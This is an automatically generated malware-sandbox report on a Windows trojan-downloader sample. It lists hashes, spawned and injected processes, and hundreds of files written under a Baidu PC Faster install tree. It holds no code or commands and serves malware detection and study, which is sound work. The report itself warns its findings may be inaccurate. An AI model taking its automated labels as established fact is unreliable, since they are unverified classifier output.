Trojan-Downloader.Win32.Genome.kevg (Kaspersky), mzpefinder_pcap_file.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan-Downloader, Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 5e71e325c991c045f846469c2e5dce7d
SHA1: 2c6d8a7f2e7b076421926f5aaa57a219e8872415
SHA256: 2591656198650a5e4a4275ba64e7c332001d111177299a1bcdd4ba82efff2fa9
SSDeep: 24576:9xFYGY9 9d/G7P9lkQ/exnzGn4dLsUvqkaT 0BpCCh PDedNdUhZuIBWcUw:ON26FOnzGn6LJvqkwnpC mWd6uIccUw
Size: 1778982 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-14 19:16:10
Analyzed on: WindowsXPESX SP3 32-bit
Summary: Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan-Downloader creates the following process(es):
%original file name%.exe:384
PCFasterSvc.exe:1628
LogReporter.exe:2200
LogReporter.exe:2412
LogReporter.exe:2160
Updater.exe:2444
sc.exe:964
sc.exe:1524
sc.exe:676
sc.exe:1704
sc.exe:1660
Baidu_Secure_SystemUp_5.0.4.87531.exe:1692
PC_Faster_Setup_Mini_B104_144327560.exe:1284
MiniService.exe:1708
MiniService.exe:2020
MiniService.exe:844
MiniService.exe:652
schtasks.exe:1544
schtasks.exe:1568
schtasks.exe:136
schtasks.exe:1676
schtasks.exe:224
schtasks.exe:1740
schtasks.exe:2032
PopupTip.exe:2760
~dlBD.exe:1160
cscript.exe:2440
irsetup.exe:508
iSafeDownloader.exe:1544
yet_another_cleaner_mat.exe:1576
The Trojan-Downloader injects its code into the following process(es):
PCFasterSvc.exe:1820
PCFTray.exe:2564
SysOptEngineSvc.exe:1724
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process %original file name%.exe:384 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (7386 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\lua5.1.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_ir_sf_temp_0\irsetup.exe (0 bytes)
The process PCFasterSvc.exe:1628 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (64 bytes)
%System%\drivers\BprotectEx.sys (601 bytes)
%System%\drivers\Bhbase.sys (47 bytes)
The process PCFasterSvc.exe:1820 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\DataReport-20141220.log (578 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\LogReporter-20141220.log (1580 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\SysOptEngineSvc-20141220.log (809 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\SysOptEngineSvc.exe (5873 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\PCFTray-20141220.log (869 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\config.ini (508 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (248 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\PCFasterSvc-20141220.log (1219 bytes)
The process LogReporter.exe:2412 makes changes in the file system.
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\verC1.tmp (0 bytes)
The process Updater.exe:2444 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavClean.dll (220 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.LeakRepair\LeakDB-x86-1033.dat (10477 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vn.dat (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavConfig.ini.7z (814 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavFi.dll (80 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavBase.dll.7z (851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\log.dll (104 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\ac.dat.7z (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\AudioList.dat (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\url.ini-0x230ff48ccb9a7fa5cd6da5797287963a.diff (148 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\tg.dat (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavScan.dll (201 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\GameList.xml (3814 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavWl.dll (234 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\server_respond.xml (422 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\AudioList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sqlite.dll.7z (2851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\dbghelp.dll (7386 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiNpc.dat (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\bdMiniDownloaderNoUITH_PCF-Mini.exe.7z (5451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUa.dll.7z (2851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\DataFileList.xml.7z (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\fs.dat.7z (414 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSk.dll (94 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavCs.dll (227 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sqlite.dll (1823 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (64 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BHips.dll (3739 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\defcfg.ini.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSig.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavVt.dll.7z (47 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\DataFileVer.xml (303 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\dbghelp.dll.7z (3851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\version.xml.7z (279 bytes)
%Documents and Settings%\All Users\Application Data\Baidu Security\PC Faster\RpData\rpFile-Updater-2014-12-20 12-35-17-0201-[17113].tmp (490 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\defcfg.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BaiduStore.dll (7386 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUp.dll (183 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BHips.dll-0xa9c5b72ee0063b8a6d28ec99127c0e9a.diff (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavFi.dll.7z (32 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavAs.dll (3700 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Optimizer\SysOpt\optlist.dat (12289 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\BrowserList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavPro_Setup_Mini_GL1.exe.7z (7251 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx.sys (115 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vn.dat.7z (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vr.dat.7z (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Communication.dll (1621 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSk.dll.7z (44 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\bdMiniDownloaderNoUITH_PCF-Mini.exe-0x28c94e73ef2c18ee861292961f5add28.diff (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx64.sys (94 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSig.dll (163 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\vr.dat (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\qs.dat (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiMac.dat (23 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sc.ini (264 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiMac.dat.7z (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\CloudOPTClient.exe (6404 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUp.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\ProgramFileList.xml.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Optimizer\SysOpt\optlist.dat-0x0d834fc92c5eeedc70c799e68d92bc1d.diff (1451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BaiduStore.dll.7z (2851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\ac.dat (40 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\log.dll.7z (46 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update_ultimate.ini (431 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\CloudOPTClient.exe-0x97675745b0ee49bde212be051e310f99.diff (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\DataFileList.xml (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\qs.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\PhotoList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\ag.dat.7z (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\BrowserList.dat (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSu.dll.7z (2051 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiNpc.dat.7z (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Communication.dll.7z (851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx64.sys-0x71e5154b386c6c46279027c3d3c1a2b9.diff (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavSu.dll (1789 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavBase.dll (296 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavConfig.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BCloudScan.exe.7z (4451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavCs.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\FileList.xml (1627 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\url.ini (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\sc.ini.7z (247 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update_statistic.xml (336 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavScan.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavVt.dll (117 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavUa.dll (5442 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log\Updater-20141220.log (75383 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\fs.dat (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavAs.dll.7z (851 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavData.dll (126 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BCloudScan.exe (9606 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\wi.dat.7z (12131 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\tg.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavPro_Setup_Mini_GL1.exe (12288 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\GameList.xml.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\version.xml (291 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BavData.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavWl.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\VideoList.dat.7z (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx.sys-0x2e0e0935f30edfffba970b63fdc0f23e.diff (9 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\bdMiniDownloaderNoUITH_PCF-Mini.exe (9606 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavClean.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\Data\ag.dat (28 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavQv.dll.7z (451 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\VideoList.dat (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Cloud Security\BavQv.dll (157 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\PhotoList.dat (11 bytes)
The Trojan-Downloader deletes the following file(s):
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiNpc.dat.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx.sys-0x2e0e0935f30edfffba970b63fdc0f23e.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BProtectEx64.sys-0x71e5154b386c6c46279027c3d3c1a2b9.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\DataFileList.xml.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\bdMiniDownloaderNoUITH_PCF-Mini.exe-0x28c94e73ef2c18ee861292961f5add28.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\CloudOPTClient.exe-0x97675745b0ee49bde212be051e310f99.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\BrowserList.dat.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\WiFiMac.dat.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\GameList.xml.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\ProgramFileList.xml.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Optimizer\SysOpt\optlist.dat-0x0d834fc92c5eeedc70c799e68d92bc1d.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\AudioList.dat.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\PhotoList.dat.7z (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\url.ini-0x230ff48ccb9a7fa5cd6da5797287963a.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\BHips.dll-0xa9c5b72ee0063b8a6d28ec99127c0e9a.diff (0 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\update\Plugins\Plugin.Tools\DefaultPrograms\VideoList.dat.7z (0 bytes)
The process Baidu_Secure_SystemUp_5.0.4.87531.exe:1692 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1054\ieprotect\ieprotect.bskin (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\common\common.bskin (371 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1056.WhiteSmkeUSNew.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1198.SaveClicker.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1181.Highlightly.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10017.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\citys.txt (10 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1089.DVDVideoSoftToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1136.AF_HSS.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\lang.ini (110 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\1.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1126.Hao123SearchRemovalTool.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1151.NinjaSavings.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0029.FreeRARExtractFrog.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\13.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Facebook\res\res.bskin (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10123.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\log2.dll (12088 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1056.WhiteSmkeUSNew.rul (16 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\ZTE_off.png (463 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\IEProtect.ini (420 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1147.EntrustedToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1181.Highlightly.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1101.VAFMusic.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1055.WhiteSmoke.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1083.PriceGong.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1057\lang.ini (110 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\dir.ini (494 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BProtectEx64.sys (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1157.AppsHat.rul (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0002.MyPCBackup.rul (661 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\update\update.bskin (14 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1143.BrowserPlus2.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\SysOpt\optrec.6.2.def.db (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\confirm\confirm.bskin (6 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\DataFileList.xml (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1155.CouponChaser.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1062.OnlineRadioPlayerRecorderToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1163.BubbleDock.rul (1552 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\LG_on.png (628 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0026.KaraFun.rul (5 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1055.WhiteSmoke.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\BaiduSafe\BaiduSafe.bskin (5520 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\VDownloader_Ask.rul (8 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1061.SearchProtect.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\3.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1108.SmartSuggestor.rul (256 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\FasterNow.exe (29256 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1122.Mysearchdial.rul (12 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10004.png (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1150.DealSlider.rul (11 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10027.png (4 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\logo\system\8.png (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\HipsDR.dll (14184 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\BugReporter\BugReporter.bskin (927 bytes)
%Documents and Settings%\All Users\Documents\Baidu Security\PC Faster\4.0.0.0\Dump\BugReportConfig.ini (1704 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1125.NCH_ENToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Optimizer\res\res.bskin (2392 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\CouponDropDown.rul (7 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFaster.exe (39770 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1133.Mp3TubeToolbar.rul (15 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\FasterNow\FasterNow.bskin (7192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\SoftIcons\10032.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\SonyEric_off.png (626 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\boottime\weather\big\cloudy.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\hipspop\hipspop.bskin (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\tools\DeepOptimization\res\res.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\EnumModules.exe (3312 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Gionee_on.png (620 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Antivirus\res\res.bskin (6360 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\nsis_install\nsis_install.bskin (3616 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\Nokia_on.png (522 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\confirm\confirm.bskin (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsmC0.tmp\sqlite.dll (20416 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1090.DVDVideoSoftToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1131.SocialSearchBar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1153.TubeDimmer.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1046\screensnpashot\screensnpashot.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\InternetHelper.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1048.MixiDjV30.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1033\tools\FasterNow\FasterNow.bskin (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Communication.dll (11048 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1095.DigiModeToolbar.rul (784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Data\0032.FreeMouseAutoClicker.rul (457 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1168.LessTabs.rul (2 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\config.ini (73 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\1028\PcfTray\PcfTray.bskin (1856 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\PCFApiUtil.sys (4992 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\I18N\3082\BaiduSafe\BaiduSafe.bskin (7192 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\GameFaster\handle.png (3 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\Plugins\Plugin.Cleaner\Rules\1115.Qwiklinx.rul (1 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\skin\Scattered\WifiSharing\device_icon\DafaultPhone_on.png (397 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\BaiduStore.dll (35784 bytes)
%Program Files%\Baidu Security\PC Faster\5.0.0.0\plugscan\data\1195.WProtectManager.rul (8 bytes)
